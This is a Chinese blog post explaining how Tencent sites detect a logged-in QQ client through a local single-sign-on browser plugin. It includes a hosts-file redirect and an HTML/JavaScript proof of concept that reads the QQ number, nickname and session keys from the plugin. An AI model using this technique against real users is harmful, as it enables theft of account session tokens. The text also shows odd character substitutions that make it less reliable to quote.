騰訊的網站是如何檢測到你的 QQ 已經登陸？

在 QQ 已經登陸的狀況下，手動輸入網址打開 QQ 郵箱 或者 QQ 空間 等騰訊網站，能夠看到網頁已經檢測到本地 QQ 客戶端已經登陸，因而用戶能夠很方便地一鍵登陸網站而沒必要再輸入用戶名密碼。

這其實是典型的異構系統單點登陸 SSO（single-sign-on）技術。 網頁怎麼會知道我登陸的 QQ 號碼？ 騰訊是如何實現的呢？

 

 

網上有不少猜想，好比:

 

1. QQ 登陸時在本地某地方存登陸 ID 信息（Cookie 或文件），用 js 讀，而後去服務器認證。可是如今的瀏覽器通常有沙箱功能，js 沒法讀到登陸 ID；並且在清空 Cookie 後依然起做用。
2. 以 IP、CPU ID、硬盤 ID 等硬件設備 hash 作惟一標識，QQ 登陸時在服務器記錄此信息，js 驗證。感受這樣依賴環境過多，QQ 不太可能採用此方法。
3. QQ 啓動某端口監聽，js 鏈接此端口。可是用 netstat 查看後，QQ 並無監聽端口。

 

有這麼一個神奇的連接，http://xui.ptlogin2.qq.com/cgi-bin/qlogin你一點開，它就檢測到你登陸了 QQ。經過查看頁面源代碼，咱們能夠發現一個關於 ptlogin 的 js文件，這段代碼中，描述了使用 ActivexObject 瀏覽器插件的過程，因而一切瞭然。

但是 ActiveX 是 IE 的插件呀，咱們使用 Chrome 或者 FireFox 也是能夠直接登陸的，這是怎麼回事呢？

原來，QQ 使用了歷史很悠久的 NPAPI（Netscape Plugin Application Programming Interface）接口。NPAPI 幾乎支持全部主流瀏覽器，包括 FireFox、Chrome、Opera（IE 從 5.5 後中止支持 NPAPI，轉而使用 ActiveX）。

打開 chrome://plugins/ 咱們能夠發現自動登陸的有關插件，而在路徑 C:\Program Files (x86)\Common Files\Tencent\TXSSO 下就能夠找到關於 SSO 的相關動態連接庫。

 

 

np 插件通常命名都會加np前綴 如 QQ 的這個 npSSOAxCtrlForPTLogin.dll，只要按照標準的寫法(NPAPI插件編程起步)，放在瀏覽器會加載的地方，用的時候寫個標籤就能夠在 js 裏面調用了。因而跨瀏覽器（無視 IE）的插件開發變得至關可行。運行在 NPAPI 插件中的代碼擁有當前用戶的全部權限，不在沙箱中運行，因此它的擴展程序在被 Chrome 網上應用店接受前要求人工審覈。(不過今年年末Chrome將徹底移除對NPAPI的支持，轉而推廣本身的NACL)@mozafish

 

有點不懷好意的想法開始萌生，我本身的網站可否借用這個插件來檢測用戶的 QQ 登陸呢？

因爲本地打開此頁面，create ActiveXObject 會加載失敗。騰訊在 dll 中就對域名進行了限制，網頁是沒法篡改的。須改本地host文件，加一條:

127.0.0.1 xui.ptlogin2.qq.com

 

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Tencent SSO Testing</title>
</head>
<body>
<script>
var g_vOptData;
var mylocation= "xui.ptlogin2.qq.com/cgi-bin1/qlogintest.html";
var pt = {
 ishttps: false,
 low_login: 0,
 keyindex: 9,
 init: function()
 {
  pt.ishttps = /^https/.test(mylocation);
  //if (navigator.mimeTypes["application/nptxsso"]) {
  var B = document.createElement("embed");
  B.type = "application/nptxsso";
  B.style.width = "0px";
  B.style.height = "0px";
  document.body.appendChild(B);
  pt.sso = B
 }
};
pt.init();
 
try {
 if (window.ActiveXObject)
 {
  q_hummerQtrl = new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");
  var A = q_hummerQtrl.CreateTXSSOData();
  q_hummerQtrl.InitSSOFPTCtrl(0, A);
  g_vOptData = q_hummerQtrl.CreateTXSSOData()
 }
 hummer_loaduin();
} catch(B) {
 alert(/create ActiveXObject failed/)
}
 
function hummer_loaduin()
{
 if (window.ActiveXObject)
 {
  var Y = q_hummerQtrl.DoOperation(1, g_vOptData);
  if (null == Y) {
   return
  }
  try
  {
   var T = Y.GetArray("PTALIST");
   var c = T.GetSize();
   var X = "";
   for (var d = 0; d < c; d++)
   {
    var E = T.GetData(d);
    var a = E.GetDWord("dwSSO_Account_dwAccountUin");
    var J = "";
    var O = E.GetByte("cSSO_Account_cAccountType");
    var b = a;
    if (O == 1)
    {
     try
     {
      J = E.GetArray("SSO_Account_AccountValueList");
      b = J.GetStr(0)
     } catch(Z) {}
    }
    var Q = 0;
    try {
    Q = E.GetWord("wSSO_Account_wFaceIndex")
    } catch(Z) {
    Q = 0
    }
    var S = "";
    try {
    S = E.GetStr("strSSO_Account_strNickName")
    } catch(Z) {
    S = ""
    }
    var F = E.GetBuf("bufGTKey_PTLOGIN");
    var G = E.GetBuf("bufST_PTLOGIN");
    var N = "";
    var A = G.GetSize();
    for (var W = 0; W < A; W++) {
    var B = G.GetAt(W).toString("16");
    if (B.length == 1) {
    B = "0" + B
    }
    N += B
    }
    var M = {
     uin: a,
     name: b,
     type: O,
     face: Q,
     nick: S,
     key: N
    };
    var str = "QQinfo\r\n"+
        "uin:" + M['uin']+"\r\n"+
        "name:"+M['name']+"\r\n"+
        "type:"+M['type']+"\r\n"+
        "face:"+M['face']+"\r\n"+
        "nick:"+M['nick']+"\r\n"+
        "key:"+M['key']+"\r\n";
    alert(str);
    q_aUinList[d] = M
   }
  } catch(Z) {}
  } else
  {
  try {
   var M = pt.sso;
   var L = M.InitPVA();
   if (L != false)
   {
    var I = M.GetPVACount();
    for (var W = 0; W < I; W++)
    {
     var C = M.GetUin(W);
     var D = M.GetAccountName(W);
     var K = M.GetFaceIndex(W);
     var U = M.GetNickname(W);
     var P = M.GetGender(W);
     var V = M.GetUinFlag(W);
     var f = M.GetGTKey(W);
     var R = M.GetST(W);
    }
    var str = "QQinfo\r\n"+
        "uin:" + C +"\r\n"+
        "name:"+D+"\r\n"+
        "face:"+K +"\r\n"+
        "nick:"+U+"\r\n"+
        "key:"+f+"\r\n";
    alert(str);
   }
  } catch(Z) {}
  }
 
}
</script>
</body>
</html>

 

來源:IT牛人博客聚合